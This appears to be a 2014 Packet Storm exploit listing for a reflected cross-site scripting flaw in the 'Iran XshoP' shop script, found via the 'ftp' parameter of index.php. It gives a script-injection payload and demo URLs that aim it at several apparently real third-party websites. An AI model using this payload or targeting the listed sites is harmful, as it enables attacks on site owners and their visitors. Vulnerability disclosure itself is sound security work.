Xshop Cross Site Scripting

2014-05-12T00:00:00
ID PACKETSTORM:126593
Type packetstorm
Reporter Medrik
Modified 2014-05-12T00:00:00

Description

                                        
                                            `# Exploit Title: Iran XshoP XSS Vulnerability  
# Google Dork: Dork Is PerSian ! See End Of Demo !  
# Date: 2014-03-27  
# Exploit Author: Medrik  
# Vendor Homepage: http://www.xshopsaz.ir/  
# Tested on: Windows  
  
  
-----------------  
  
Proof : Vulnerability in : index.php Page With (ftp) Paramter !  
  
Exploit : http://vulnerable_host/index.php?ftp=[XSS]  
  
  
-----------------  
  
D3m0 :  
  
  
http://powermc.net/index.php?ftp=%22%3E%3Cscript%3Ealert%28/Medrik/%29%3C/script%3E  
http://www.ebuy-internet.ir/index.php?ftp=%22%3E%3Cscript%3Ealert%28/Medrik/%29%3C/script%3E  
http://tak.kingshop92.ir/index.php?ftp=%22%3E%3Cscript%3Ealert%28/Medrik/%29%3C/script%3E  
http://www.mci5.net/index.php?ftp=%22%3E%3Cscript%3Ealert%28/Medrik/%29%3C/script%3E  
  
  
  
----  
  
  
Spc Tnx : Iran Security Team , Iranian Exploit Database , R.H.H   
Thanks : Enddo , Amir ,S!YOU.T4r.6T Explo!ter , Beni_vanda , Radical , YoSeF_HaCkeR  
  
  
./2014 , Grey Hat Boys  
`